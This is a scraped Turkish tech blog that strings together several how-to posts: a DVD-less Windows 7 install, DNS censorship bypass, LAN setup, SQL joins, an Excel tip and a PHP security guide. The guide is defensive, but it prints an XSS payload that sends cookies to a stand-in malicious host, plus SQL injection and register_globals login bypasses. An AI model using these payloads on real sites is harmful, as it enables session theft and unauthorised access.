Sevgili arkadaşım Selim (Poyraz) evde kullandığı bilgisayarına Windows 7’yi kurmak istemekteydi. Fakat bilgisayarın DVD-ROM’u sorunlu olduğundan Windows 7 kurulum DVD’sini maalesef okuyamıyordu. Bunun üzerine yaptığım araştırma ile Windows 7’yi DVD-ROM gerektirmeden kurma yöntemini buldum ve aşağıda sizinle paylaşıyorum.

Gereksinimler

Windows 7 DVD Imaj dosyası (iso,nrg,vb.)

WinRAR yada 7-Zip

Farklı bir disk bölümü (D: vb.)

Biraz zaman… :)

1.Adım :

Öncelikle Windows 7 DVD’sinin imajı elimizde olması lazım. Bunu herhangi bir DVD yazma yazılımı ile (Nero vb.) orijinal DVD’den bir imaj alarak yapabilirsiniz. Yada bir şekilde bu imaja sahip olmanız gerekmekte.

2.Adım :

Sistemin kurulu olduğu sürücüyü C olarak varsayarsak D yada farklı bir sürücünün kök dizinine Windows7 adında bir klasör oluşturun.

Windows 7 İmajını WinRAR yada 7-Zip ile açıp yeni oluşturduğumuz Windows7 klasörüne genişletelim.

3.Adım :

Eğer Vista haricinde bir sürüm kullanıyorsanız :

Yeni oluşturduğumuz Windows7 klasöründeki bootmgr dosyasını ve boot klasörünü sistem sürücüsü olan C sürücüsünün kök dizinine kopyalayın.

Eğer Vista kullanıyorsanız :

Yeni oluşturduğumuz Windows7 klasöründeki
bootmgr dosyasını C kök dizinine,
boot klasöründeki boot.sdi dosyasını C kök dizindeki boot klasörüne,
boot klasöründeki bootsect.exe dosyasını C kök dizindeki boot klasörüne
kopyalayın.

4.Adım :

C kök dizinine sources adında bir klasör oluşturun.
Yeni oluşturduğumuz Windows7 klasöründeki sources klasörünün içinden boot.win dosyasını yeni oluşturduğumuz sources klasörüne kopyalayın.

5.Adım :

Başlat Menüsü->Programlar->Donatılar altında Komut İstemi’ne sağ tıklayıp Yönetici olarak çalıştır’a tıklayın.

Sistem sürücüsünün C olduğunu varsayarak.

Eğer Vista haricinde bir sürüm kullanıyorsanız :

C:\boot\bootsect.exe /nt60 C:

Eğer Vista kullanıyorsanız :

C:\bootsect.exe /nt60 C:

komutunu girin.

“completes successfully.” mesajını alıyorsak işleme devam edebiliriz.

6.Adım :

C sürücüsüne format atmamız gerektiği için sürücü adını tekrardan belirlememiz gerekmektedir. Bu sebepten aşağıdaki komut ile sürücü adını değiştirin.

C sürücüsünde olduğunuza emin olun (C:\)
label komutunu yazıp enter tuşuna basın.
Sürücü adını ABC olarak değiştirin.

7.Adım :

Her şey tamamsa hiç bir sorun yoksa ve alacağımız yedeklerimizi aldıysak makineyi yeniden başlatın.
Yeniden başlatma sonunda eski Windows’umuz yerine Windows 7 kurulum başlayacaktır. Windows7 kurulumu sizden Dil ve Tarih Saat formatı bilgileri isteyecektir. Bu bilgileri girdikten sonra kur Windows 7’yi ne şekilde kuracağınızı soracaktır. Bu ekranda iken sol alt köşedeki Bilgisayarımı Onar’a tıklayın.
Karşınıza Sistem Onarım Seçenekleri gelecektir. Bu seçeneklerden Komut İstemi seçeneğine tıklayın. Bu işlem sonunda karşınıza Komut İstemi (DOS) gelmelidir.

8.Adım :

Önemli ! Bu işlem C sürücüsündeki tüm verileri yok edecektir.

Komut İstemi ekranında C sürücüsünü formatlamak için aşağıdaki komutu girin.

format c: /q

Eğer C sürücüsünün dosya sistemi NTFS değil ise,

format c: /q /fs:ntfs

komutunu kullanın.

Formatlama işlemine başlamadan önce size ilgili sürücünün adını soracaktır. Daha önceden label komutu ile değiştirdiğimiz ad olan ABC’yi girin.

Böylece formatlama işlemi başlayıp sistem C sürücüsünü formatlayacaktır.

9.Adım :

Ve geldik sona…

Şimdi Windows 7 kurulumunu elle başlatmamız gerekiyor. Bunun için aşağıdaki komutu girin.

D:\Windows7\sources\setup.exe

Ve karşınızda Windows 7 kurulumu. Bundan sonraki adımlar standart Windows 7 kurulumu ile aynıdır. Sadece dikkat etmeniz gereken tek nokta kurulumun size hangi sürücüye kurmak istediğinizi sorduğu ekranda yeni formatladığımız sürücüyü seçmek.

Kolay Gelsin.

Benzer yazı bulunamadı.

• 17 Temmuz 2006 -- resmi php ile görüntüleme (0)
• 25 Ocak 2008 -- Youtube Videolarını İndirin… (0)
• 4 Haziran 2007 -- Tam Ekran CSS/DHTML Preloader (2)
• 30 Ocak 2008 -- Linux Terminal Komutları (1)
• 31 Ekim 2006 -- Pretty Girl :) (0)
• 28 Mart 2007 -- String ten TR karakterleri temizleme (0)
• 13 Aralık 2006 -- ADSL Nasıl Çalışır ? (0)
• 20 Şubat 2009 -- PHP Güvenlik Kılavuzu (4)
• 28 Mart 2007 -- BuyukHarfYap Fonksiyonu (0)
• 28 Mart 2007 -- Dokunmatik Ekran ve Linux XGL Çılgınlığı (1)

Mahkeme kararı olmaksızın Telekomünikasyon İletişim Başkanlığı’nın kendi keyfi kararları ile engellediği pek çok siteye ulaşabilmek için artık dört takla atmanıza gerek yok. Yabancı bir hizmet olan OpenDNS’in Türkiye merkezli hali yeni yılın ilk günlerinde hizmete başladı. OpenDNS ile yaklaşık olarak aynı işi yapan fakat merkezi Türkiye olduğundan daha hızlı çalışan bu hizmet ile internet sansürlerinden kurtulabileceksiniz.

Nasıl sansürleniyoruz ?

T.İ.B. servis sağlayıcı üzerinde bulunan DNS sunucusunda yasaklanması istenen alan adlarını daha önceden hazırlanmış yasak bilgisi bulunan bir ip adresine yönlendirerek sizin o siteye ulaşmanızı engellemektedir. DNS konusunu burada uzunca anlatmak isterdim ama konumuz şu anda DNS değil. DNS kısaca internet üzerinde bize kolaylık sağlayan bir fihristtir. DNS icat edilmeden önce bir web sitesine girmek için onun kimlik numarası olan IP adresini girmemiz gerekiyordu. DNS, alan adlarının hangi ip adreslerine ait olduğunu indexleyen, biz sorduğumuzda bize şu IP adresi diyen bir sistemdir. T.İ.B. bize gerçek ip adresi yerine sahte IP adresi bilgisi vererek o siteye ulaşmamızı engeller.

AçıkDNS nasıl çalışır ?

AçıkDNS kendi sunucularında kurulu olan DNS sunucusu ile dünyanın çeşitli bölgelerinde bulunan Ana DNS Sunucularından (Root DNS) sorgulayarak bize gerçek IP adresleri temin eder. Böylece hiç bir yasağa takılmadan istediğimiz siteye erişebiliriz.

AçıkDNS Güvenli midir ?

AçıkDNS’in sahibi yakın bir arkadaşım. Sitenin ve sistemin yapımında birlikte ter döktük diyebilirim. AçıkDNS hiç bir şekilde kayıt tutmamaktadır. Aynı şekilde hiç bir şekilde HiJack diye tabir edilen sahte bilgi gönderimi yapmamaktadır. Yaptığı şey Root DNS’lerde sizin istediğiniz bilgiyi çekip size göndermektir.

Nasıl Kullanılır ?

AçıkDNS’e http://www.acikdns.com adresinden ulaşabilirsiniz. Sol tarafta göreceğiniz menüden işletim sisteminize uygun olan videoyu izleyerek AçıkDNS’i kullanmaya başlayabilirsiniz. 

Benzer Yazılar

• 25 Ocak 2008 -- Youtube Videolarını İndirin… (0)
• 28 Mart 2007 -- Dokunmatik Ekran ve Linux XGL Çılgınlığı (1)

Firmamızın bir hizmeti olan Newskolik.Net Haber Sunucularıdan göze çarpan ve insanlara faydalı olacak bilgileri bu kategori altında elimden geldiğince sizlerle paylaşmaya çalışacağım.

İlk mesaj olarakta bir arkadaşımızın sorununu ve cevabımı yayınlamayı uygun gördüm.

Mesaj ID : news:4b3c61d9$1@news.newskolik.net

Habergrubu : sohbet

Tarih :  31.12.2009

Konu : Bir Soru

Mesaj :

Arkadaşlar,
toplam bir sabit ikide laptop bilgisayar var internet sabit bilgisayarda bunlar arasında nasıl ağ bağlantısı kurarım birlikte oyun oynarız bunları bir karacahil’e anlatacak kadar sabırlı önerilerinizi bekliyorum.

Cevap :

Adım 1

Tüm makinelerin IP sınıfının aynı hale getirlimesi ;
Eğer makinelere ip adresi bir DHCP sunucusu üzerinden otomatik verilmiyor ise :
Ağ bağlantılarından o anda aktif olan bağlantının (yerel ağ bağlantısı yada kablosuz ağ bağlantısı) üstüne sağ tıklanır. Özelliklere girilir.
Listeden Internet Protokolü sürüm 4 TCP/IP seçilir. Özellikler denir.
Ip adresi alanına modemin ip adresi ne ise son grubu farklı olacak sekilde ip atanır.

Örnek;
Modem IP : 192.168.1.1
1. Bilgisayar : 192.168.1.2
2. Bilgisayar : 192.168.1.3

Ağ alt maskesi otomatik gelir zaten.
Ağ geçidi alanına ise Modemin ipsi ne ise o yazılır.

DNS sunucu kısmına Yakonun www.acikdns.com ip leri girilebilir.

Böylece tüm bilgisayar aynı IP classında olurlar.
Eğer DHCP tarafından otomatik ip veriliyorsa, zaten aynı classtadırlar.

Adım 2

Tüm makinelerin aynı çalışma gurubunda / etki alanında olması ;
Evden bahsettiğin için etki alanını es geçiyorum.
Tüm bilgisayarlarda Bilgisayarım sağ tıklanır. Özellikler denir.

XP için ;
Bilgisayar adı sekmesi
Vista / 7 için;
sağ taraftan Gelişmiş sistem ayarları -> Bilgisayar Adı sekmesi.

Burada Bilgisayar adı ve Çalışma grubu ibareleri bizim için önem taşımaktadır.
Tüm bilgisayarların adı birbirinden mutlaka farklı olmalıdır.
ve
Tüm bilgisayarların çalışma grubu birbiri ile aynı olmalıdır. (WORKGROUP)
Onaylanır yeniden başlatılır.

Adım 3

IPX/SPX Kurulumu;
Bir çok oyun IPX/SPX protokolü ile LAN üzerinden oyun oynamanızı sağlar.
Bu sebepten Ağ bağlantısı yaptıgınız aygıtta IPX/SPX yuklu olmalıdır.

Adım 1 deki Ağ bağdaştırıcı özellikler listesine gelip. (Internet Protokolu TCP/IP nin oldugu ekran) o listede IPX/SPX varmı kontrol etmelisin. Yok ise Ekle butonuna basıp Protokol -> IPX/SPX i seçip kurman gerekir.

Sonuç

Tüm bu ayarlardan sonra ağ üzerinde yada bilgisayarlarda herhangi bir firewall yok ise engelleme söz konusu değil ise sorunsuz bir şekilde LAN da oyun oynayabilir, paylaşım ayarlarını yaparsan Ağ komşularından diğer pclerin dosyalarına ulasabilirsin.

Dip : IPX/SPX Vista ve 7 de yok sanırsam (gerek duymuyor)

Benzer Yazılar

• 13 Aralık 2006 -- IP Adresleme / Alt Ağlara Bölme (0)
• 28 Mart 2007 -- Mac Adresi Bulma (0)

Giriş

PHP, bir çok yazılım dilinden farklı olarak, buffer-overflows gibi hafıza problemleri olan, bundan dolayı güvenlik problemine neden olabilecek bir dil değildir. Aynı zamanda PHP öğrenilmesi kolay ve hızlı bir dildir. Bu kolay ve hızlı öğrenilebilirlik, bu dili bir çok kişinin öğrenmesine, aynı hızda üretim yaparak uygulama geliştirmesine de olanak sağlamaktadır. Ancak bu durum, bilinsizce yapılan kodlama teknikleri nedeniyle kendi içerisince ciddi bir güvenlik problemini yanında getirmektedir.
Bu klavuz size, online güvenlik, web tabanlı yazılım geliştirirken PHP’de temel güvenliği nasıl sağlayacağınız konusunda fikir vermek için hazırlanmıştır. Klavuz içerisinde başlangıç seviyesi kullanıcılar için önemli bilgiler, uzmanlar için belki de gözden kaçan ufak ipuçları bulunabilir.

Atak Tipleri:

XSS Atağı:
XSS “Cross Site Scriptting” anlamında kullanılmaktadır ve bir sayfaya içerik girmek -JavaScript gibi- gibi düşünebiliriz. XSS atakları genelde kullanıcının Cookie (çerez) lerini çalmak amacıyla kullanılır. Bu cookie’ler kullanıcı login bilgileri, sişreleri ya da benzeri önemli bilgileri içeriyor olabilir.

Basit anlamda bir örnek verelim.

$id=$_GET['id'];
echo "Gelen ID degeri:".$id;

Yukarıdaki kodda, $_GET[’id’] degiskeni bir sayı ise problem yok. Ancak ya aşağıdaki gibi bir kodsa?

<script>
window.location.href = "http://kotuamaclisite.com/cookie-calanscript.php?c=' + document.cookie;
</script>

Kullanıcı bir sekilde, bu kotu amaçlı kodu çalıştırırsa, tüm cookie bilgilerini kotü amaçlı siteye devredebilir.

XSS Ataklarından Nasıl Korunurum?

İlk olarak, asla kullanıcı girişi bilgilerine güvenmeyiniz. Kullanıcılardan girilen her bilgiyi mutlaka kontrol edip filtrelememiz gerekiyor. Yani gelen kullanıcı bilgilerini HTML tag’lerinden arındırırsak bir JavaScript kodu çalıştırılamak hale getirebiliriz. Bunu yapmanın en kolay yolu PHP’nin strip_tags() fonksiyonunu kullanmaktır. Bu fonksiyon tüm HTML tag’lerini temizleyecektir. HTML tag’lerini silmemek ama onları zararsız hale getirmk için htmlentities() fonksiyonunu da kullananilirsiniz. Bu fonksiyon, < ve > karakterlerini < ve >karakterlerine dönüştürecektir.

SQL Injection Yönetemi:

Günümüzde bir çok web sitesi verileri barındırmak için veritabanı kullanmaktadır. Bu bağlamda veritabanına girmek için bir çok INSERT, UPDATE ve SELECT işlemleri yapılmaktadır. Buna rağmen bir çok site, form verileri açısında SQL Injection yöntemi ile atağa uğramak konusunda yeterli güvenliğe sahip değildir.

SQL Injection, değiştirilmiş, atak için düzenlenmiş form içerikleri ile yapılan veritabanı sorgularıdır. Bu ataklar veritabanınızdan bir kaç veriyi çalmak, izinsiz login olmak, ya da tüm veritabanını silmek gibi sonuçları doğurabilir.

En genel kullanımı anlatmak için aşağıdaki kod örneğine bakalım:

site_users
WHERE
username = '$username'
AND
password = '$password'
");

if ( mysql_num_rows($result) > 0 )
// login oldu

Yukarıdaki kod örneği, SQL Injection için gerekli ortamı hazırlamaktadır, bu konuda zaafiyet oluştrabilecek bir kod örneğidir. Kötü amaçlı bir kişi yukarıdaki SQL’i değiştirerek sisteme izinsiz giriş yapabilir. (Kullanıcı şifresini girmeden login olabilir)

Örneğin kötü kullanıcı (saldırgan) kullanıcı adı alanına “rob” şifre (password) alanına aşağıdaki gibi bir giriş yaparsa:

‘ OR 1=1 ‘

Yukarıdaki kod şu şekli alır:

SELECT *
FROM
site_users
WHERE
username = 'rob'
AND
password = " OR 1=1

Bu SQL sorgusu ise, kullanıcı adı “rob” olan kaydın şifresi ne olursa olsun getirmektedir. Yani şifre kontrolu gerçekleşememiştir.

SQL Injection Atağından Nasıl Korunurum?

XSS Atağında olduğu gibi, en büyük sorun kullanıcının gönderdiği veriyi olduğu gibi kullanmaktır. Korunmanın en iyi yöntemi ise, kullancıı verisini riskli karakterlerden arındırmaktır. mysql_real_escape_string() fonksiyonu bu amaçla PHP içerisinde yer alıyor. Bu fonksiyon riskli olan ‘ ve ” gibi karakterleri temizlemektedir. Ayrıca, SQL sorgularınızda kullandığınız kullancıı verileri, eğer, sayı olmanı bekleniyorsa intval() fonksiyonu ile gelen verinin sadece sayı bilgisi olan kısmı alınmalıdır.

Dosya Yüklemesi Atağı (File Upload)

Kullancıların yükledikleri dosyalar en büyük güvenlik risk unsurlarının başında gelmektedir. Bu, tanımadığınzı bilmediğiniz dosyaları sunucunuzda barındırmak anlamındadır. Bu dosyalar, dosyalarınız silmek için, veri tabanınızı boşaltmak için olabilir. Ya da daha başka bir çok güvenlik problemine neden açabilecek dosyalar olabilir.

Buna rağmen, güvenli şekilde dosya almak kontrol içerisinde alındığında mümkündür.

Kullanıcıların sisteminize dosya yüklemesine izin verdiğiniz durumlarda, kontrol etmeniz gereken 2 önemli bilgi mevcuttur.

Birincisi, dosyanın “mime-type” ıdır. Yani, dosyanın header’ında bulunan ve dosya tipini belirten bölüm. Örneğin kullanıcının sadece resim dosyası upload etmesini istiyorsanız yüklenen dosyanın “mime-type” ı image/png, image/jpeg, image/gif, image/x-png ya da image/p-jpeg olmalıdır. Aşağıdaki kod bu kontrolü gerçekleştirir.

$validMimes = array(
'image/png',
'image/x-png',
'image/gif',
'image/jpeg',
'image/pjpeg'
);

$image = $_FILES['image'];

if(!in_array($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// İşlem tamam yüklemeyi gerçekletir vs vs.

İkinci kontrol etmeniz gereken bilgi ise, dosyanın uzantısıdır. Zira, mime-type bilgisi manuple edilebilir bir bilgidir. Bu bağlamda dosyanın uzantısını kontrol etmeniz gerekir. Zira bir kullanıcı, bir imaj dosyasının mime-type ı ile bir PHP dosyası gönderebilir. Bu durumda siz bir PHP dosyasını sisteminize almış olursunuz ki bu çok ciddi bir risk faktörüdür.

Bu durumdan korunmak için, sisteminize yüklediğiniz dosyaların uzantıları, siz tanımlamalısınız. Bu tanımlamayı ise mime-type bilgise göre yapabilirsiniz. Aşağıdaki örneğe bakalım:

$validMimes = array(
'image/png' => '.png',
'image/x-png' => '.png',
'image/gif' => '.gif',
'image/jpeg' => '.jpg',
'image/pjpeg' => '.jpg'
);

$image = $_FILES['image'];

if(!array_key_exists($image['type'], $validMimes)) {
die('Üzgünüm, izin verilmeyen dosya tipi.');
}

// Dosya uzantısını barındırmayan dosya adını alalım:
$filename = substr($image['name'], 0, strrpos($image['name'], '.'));

// Mime type göre dogru uzantıyı verelim
$filename .= $validMimes[$image['type']];

// İşlem tamam

Yukarıdaki örnekle, bir PHP dosyanının sanki bir resim dosyasıymış gibi sisteminize PHP dosyası olarak yüklenmesini engellediniz. Dosya mime-type’ı PNG’yi işaret ediyorsa, dosya uzantısı .png olacaktır.

Dosya Include Atağı:

Kullanımı çok yaygın olan index.php?sayfa=xxxx.php şeklideki dosya include yöntemi çok ciddi risk taşıyabilir. Bu kullanım genelde, menü yapısı, logo gibi bölümleri index.php ye kaydedip içerik bölümünü başka dosyalarda saklayarak site yönetimini kolaylaştırmak için kullanılır. Bu durumdaki yanlışlık,

include $_GET['sayfa'];

gibi bir kod ile gelen değişkene göre sayfayı include etmektendir.

Yukaridaki kullanımda PHP’nin allow_url_fopen ayarı ON durumda ise, yani aktifse, saldırgan başka bir sunucudaki dosyayı sitenize include edebiliyor demektir. Kodunuz da echo file_get_contents() değil de include kullanıdığı için bu çok sık karşılaşılan bir açığa sebebiyet vermektedir. Bu durum, sunucunuzun tüm kontrolünü saldırgana bırakmak demektir.

Bu durumdan yapabileceğiniz 2 şey vardır.

Birincisi, bir liste oluşturup gelen değişkeni burada kontrol etmektir. Örneğin şöyle bir kod ile:

switch($_GET['sayfa']) {
case "hakkimizda":
include('hakkimizda.php');
break;
case "haberler":
include('haberler.php');
break;
default:
include('anasayfa.php');
}

Bu kod ile include edebileceğiniz her sayfayı belirtiyor ve belirtmediğiniz sayfa için anasayfa.php dosyasını include ediyorsunuz. Bu yöntemin zor tarafı, ekleyeceğiniz her sayfayı bu listeye de eklemek zorunluluğudur.

İkinci bir yöntem ise, dışarodan gelen $_GET['sayfa'] değişkenini kontrol etmek ve temizlemektir.

$sayfa = preg_replace('/\W/si', '', $_GET['sayfa']);

include('./'.$sayfa.'.php');

Yukarıdaki kod, “..”, “/” gibi karakterleri temizleyerek kullanıcının 212.111.111.111 gibi ip ya da http://www.kotusite.com gibi domain belirtmesini engeller. Bu verileri 212111111111, httpwwwkotusitecom şekline çevirir.

Dosya include atağındaki diğer bir açık ise, include edilen dosyaların uzantılarını .inc gibi sunucunun tanımayacağı bir uzantı yapmaktır. Örneğin, config.inc gibi bir dosya yapıp bunu include etmek çok sakıncalı olabilir. Zira, saldırgan bu dosyanın adını ve yerini öğrendiğinde, eğer web suncuunuz bu dosyayı çalıştırabilir bir dosya olarak tanımıyorsa (ki tanımama ihtimali yüksektir), saldırdan dosya içeriğini görecektir. Bu durumda yapabileceğiniz, her türlü dosya uzantınızı .php yapmaktır. Boylece saldırgan bu dosyaların içeriğini görüntüleyemez. Diğer bir yöntem ise Apache sunucular için, aşağıdaki gibi bir .htaccess dosyası olusturarak .inc dosyalarının ulaşılmasını engelleyebilirsiniz.

<files ~ "\.inc$">
Order allow,deny
Deny from all
</files>

Register Globals Atağı:

register_globals değeri PHP ayarında ON durumda ise, $_POST, $_GET, $_SERVER, $_COOKIE, $_REQUEST, $_FILE ile gelen değişkenlere global değişkenler olarak ulaşabilirsiniz. Yani mesela $_POST[’mesaj’] değişkenine $mesaj olarak ulaşabilirsiniz.

register_globals değeri güncel PHP kurulumlarında varsayılan olarak OFF durumdadır. Ancak eski bir PHP kurulumu bulunan sunucuda, ya da sistem yönetici tarafından özellikle açılmış bir sunucuda ON durumunda olabilir (ki paylaşımlı hosting firmaları geçmiş müşterilerinin kodlarının uyumu adına açabiliyorlar).

register_globals’in ON olamsı durumu için aşağıdaki kodu inceleyelim.

dosya.php dosyası örneği:

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Saldırgan, dosya.php?authenticated=true şeklinde bir URL çağrımı ile, sisteme izinsiz giriş yapabilir.

Bu durumda ne yapacağız, register_globals değerini OFF yapamayabileceğimiz durumların her zaman gerçekleşebileceğini düşünerek, kodumuzu şu şekilde değiştirelim.

$authenticated = false;

if($_POST['username'] == 'rob' && $_POST['password'] == 'foo') {
$authenticated = true;
}

if($authenticated) {
// giriş başarılı bişeyler yapalım
}

Bu kod, $authenticated değişkenini sayfa başında false yapmaktadır. $_POST’tan gelen veri eğer uygunsa $authenticated true yapılır. Böylece, dışarıdan gönderilen değişken ile izinsiz giriş yaplıması engellenmiş olur.

Derleme ve Çeviri : Okan ARI

Benzer Yazılar

• 24 Eylül 2008 -- PicLens XML Parser for ImageVue Image Gallery (3)
• 23 Şubat 2008 -- Inner, Outer, Left, Right, Cross(Full) Join Nedir ? (3)
• 25 Ocak 2008 -- İl / İlçe / Mahalle Veritabanı (7)
• 12 Nisan 2007 -- Kısayoldan SQL Tablo Tasarımı (1)
• 28 Mart 2007 -- SQL den alınan tarih bilgisini düzenleme (2)
• 13 Aralık 2006 -- URL String Güvenliği (0)
• 13 Aralık 2006 -- %100 Site Güvenliği (0)
• 29 Ocak 2006 -- Dos Saldırları İçin (2)

Öncelikle PicLens fotograflarımızın küçük hallerini ve büyük hallerini bir RSS (XML) içinde toplamamızı istiyor ve bu topladığımız bilgileri photos.rss adı aldında galerinin bulunduğu ana klasörde bulundurmamız gerekiyor. Aşağıda yazdığım php kodu galerimizin bulunduğu klasörler içindeki fotolarmızı araştırıp XML haline getiriyor. Bilindiği üzere RSS uzantısı text/plain bir uzantıdır. Öncelikle rss uzantısı ile php çalıştıracağımızı Apache Web Sunucusu yazılımına bildirmemiz gerekli. Bu sebepten galerinin kök dizinine .htaccess diye bir dosya oluşturup içine aşağıdaki kodu yazıyoruz.

.htaccess içeriği

AddType application/x-httpd-php .rss

Daha sonrasında aşağıdaki kodları photos.rss dosyasını oluşturarak içine yapıştırıyoruz.

photos.rss içeriği

/*
PicLens XML Parser for ImageVue Image Gallery
Coder by Victorious
Web : http://muzaffer.akyil.net & Gallery : http://muzaffer.akyil.net/galeri
*/

//Tanımlar
$title = "Muzaffer AKYIL - Photographer"; //Sayfa Başlığı
$desc = "Muzaffer AKYIL Photographer"; //Sayfa Açıklaması
$link = "http://muzaffer.akyil.net/galeri/"; //Sayfa Linki
$klasor = "./content"; //Fotoğrafların Bulunduğu Klasör
// Tanım Sonu

header("Content-Type: application/xml; charset=ISO-8859-9");
function ListFiles($dir) {
    if($dh = opendir($dir)) {
        $files = Array();
        $inner_files = Array();
        while($file = readdir($dh)) {
            if($file != "." && $file != ".." && $file[0] != '.') {
                if(is_dir($dir . "/" . $file)) {
                    $inner_files = ListFiles($dir . "/" . $file);
                    if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                } else {
				if(substr($file,-3) == 'jpg' || substr($file,-3) == 'JPG'){
					if(substr($file,0,2)!='tn') {
                    	array_push($files, $dir . "/tn_" . $file);
					}
				}
                }
            }
        }
        closedir($dh);
        return $files;
    }
}
echo '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>'.$title.'</title>
        <link>'.$link.'</link>
        <description>'.$desc.'</description>
';
$x = 1;
foreach (ListFiles($klasor) as $key=>$file){
$normal_file = str_replace("tn_","",$file);
$thumb = $file;
echo "<item>
                <title>$x</title>
                <link>$file</link>
                <guid>$x</guid>
                <media :thumbnail url=\"$thumb\" />
                <media :content url=\"$normal_file\" type=\"image/jpeg\" />
        </item>";
$x = $x + 1;
}
echo '</channel>
</rss>';

Son olarak photos.rss içindeki Tanımlar bölümündeki bilgileri kendi galerimize göre değiştiriyoruz.

Artık galerinizin ana sayfasına girip PicLens butonuna tıklayabilirsiniz.

Kolay Gelsin.

Benzer Yazılar

• 20 Şubat 2009 -- PHP Güvenlik Kılavuzu (4)
• 12 Nisan 2007 -- Kısayoldan SQL Tablo Tasarımı (1)

Bunlar aşağıda belirtildiği şekilde kullanılır.

Inner Join

Çok basit olarak inner join  bir-e-bir join anlamına gelmektedir. İki tablonuz olduğunu düşünün TabloA da Alan1 adlı bir alanınız var bu alanda A,B,C değerleri var,
TabloB de Alan1 de ise A,B,K değerleri var.

Eğer iki tablo arasında inner join kurarsanız sonuç ta dönecek listede sadece A ve B değerleri olacaktır. Çünkü inner joinde yanlızca eşit olan kayıtlar döner.

SELECT TabloA.Alan1 as TabloAAlan1 , TabloB.Alan1 as TabloBAlan1
FROM TabloA INNER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 = TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
*/

Outer Join

Çok basit olarak outer bir-e-çoklu join anlamına gelmektedir (MsSQL Server da çok-a-çoklu join de kurulabilmektedir). İki tablonuz olduğunu düşünün TabloA da Alan1 adlı bir alanınız var bu alanda A,B,C değerleri var, TabloB de Alan1 de ise A,B,K değerleri var.

Eğer iki tablo arasında outer join kuracaksınız ve sizin için TabloA daki tüm kayıtlar TabloB de ise sadece TabloA da bulunanlar gelir.

Left Outer Join

Join kelimesinin sol tarafındaki tabloyu baz alarak eklemek için kullanılır.

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA LEFT OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 *= TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
C Null
*/

Right Outer Join
Join kelimesinin sağ tarafındaki tabloyu baz alarak eklemek için kullanılır.

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA RIGHT OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 =* TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
Null K
*/

Full Outer Join (MySQL için Cross Outer Join)
Her iki tablodaki tüm verileri getirmek için kullanılır.

SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA FULL OUTER JOIN TabloB
ON TabloA.Alan1 = TabloB.Alan1
/*
Bu kodun MSSQL de sade şekli şudur :
*/
SELECT TabloA.Alan1 as TabloAAlan1, TabloB.Alan1 as TabloBAlan1
FROM TabloA , TabloB
WHERE TabloA.Alan1 =* TabloB.Alan1
/*
Dönen Sonuç :
TabloAAlan1 TabloBAlan1
A A
B B
Null K
C Null
*/

Join’ nin sade halinde kullanılan “*” karakteri ise sadece Ms SQL Server’a özeldir. Oracle da ise bu karakter yerine “(+)” işareti kullanılmaktadır ve alan isimlerin sonuna bir boşluk bırakarak yazılır.

Örnek olarak : WHERE TabloA.Alan1 = TabloB.Alan1 (+)

OUTER cümlesi kullanılmasada olur. (Left Join gibi)

Kolay Gelsin.

Benzer Yazılar

• 12 Nisan 2007 -- Kısayoldan SQL Tablo Tasarımı (1)
• 20 Şubat 2009 -- PHP Güvenlik Kılavuzu (4)
• 25 Ocak 2008 -- İl / İlçe / Mahalle Veritabanı (7)
• 28 Mart 2007 -- SQL den alınan tarih bilgisini düzenleme (2)

Aşağıdaki işlemleri uyguladıktan sonra tabiki gösterebilir :)

Öncelikle mükerrer kayıtları arayacağımız alanı seçiyoruz ;

Ekle menüsü altında Ad – Tanımla’ya tıklayıp gelen pencerede istediğimiz bir ad yazıp Ekle diyoruz. Böylece Seçtiğimiz alanı bir liste olarak Excel’e tanıtmış oluyoruz.

Seçtiğimiz alan hala aktif iken Biçim menüsü Koşullu Biçimlendirme’ye tıklıyor ve Koşul 1 de Formül seçip yantarafına =EĞER(EĞERSAY(TEST;A1)>1;DOĞRU; YANLIŞ) formulünü yazıyoruz. Sonrasında bu koşul gerçekleştiğinde biçimlendirmenin nasıl olacağını Biçim’e tıklayarak belirliyoruz ve Tamam diyerek işlemi bitiriyoruz.

Formülde kullanılan TEST kelimesi sizin tanımladığını Ad – Tanımla da belirttiğiniz kelimedir. Değiştirmeyi unutmayınız.

Ve sonuç karşınızda artık mükerrer kayıtlarım belirlediğim biçimlendirme ile bana gösteriliyor.

Kolay Gelsin.

Benzer Yazılar

• 22 Ocak 2008 -- Metine Dönüştür Makrosu (1)
• 16 Nisan 2007 -- Paylaşılan Klasörleri Gizleme (0)
• 16 Nisan 2007 -- Unlocker 1.8.5 – Kullanımda olan dosyaları silmek için (0)
• 11 Nisan 2007 -- winmail.dat Outlook Ek Dosya Sorunsalı (0)
• 28 Mart 2007 -- Dokunmatik Ekran ve Linux XGL Çılgınlığı (1)
• 13 Aralık 2006 -- Bilgisayara Virüs Bulaştığı Nasıl Anlaşılır ve Nasıl Temizlenir? (1)

Buryun ;

A
apropos – whatis veritabanında anahtar sözcüğü arar
autoconf – yapılandırma betiklerini oluşturur
